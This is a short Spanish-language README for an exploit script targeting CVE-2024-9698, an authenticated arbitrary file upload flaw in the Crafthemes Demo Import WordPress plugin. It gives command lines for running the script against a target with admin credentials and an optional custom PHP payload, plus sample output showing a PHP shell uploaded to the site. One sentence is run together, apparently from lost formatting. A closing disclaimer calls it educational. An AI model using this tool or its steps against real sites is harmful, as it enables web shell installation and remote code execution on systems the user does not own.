
Crafthemes Demo Import <= 3.3 - Autenticado (Admin+) Subida de archivos arbitraria en process_uploaded_files
Este exploit aprovecha una vulnerabilidad crítica (CVE-2024-9698) en el plugin Crafthemes Demo Import para WordPress. La vulnerabilidad permite a administradores autenticados cargar archivos arbitrarios en el sitio WordPress afectado, lo que conduce a una potencial ejecución remota de código (RCE).
process_uploaded_filesreadme.txt.admin-ajax.php para cargar un shell PHP personalizado.python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
Si desea cargar un payload PHP personalizado, use:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
Descargo de responsabilidad: Este script está destinado únicamente a fines educativos y de investigación de seguridad. El uso no autorizado contra sistemas sin permiso explícito es ilegal.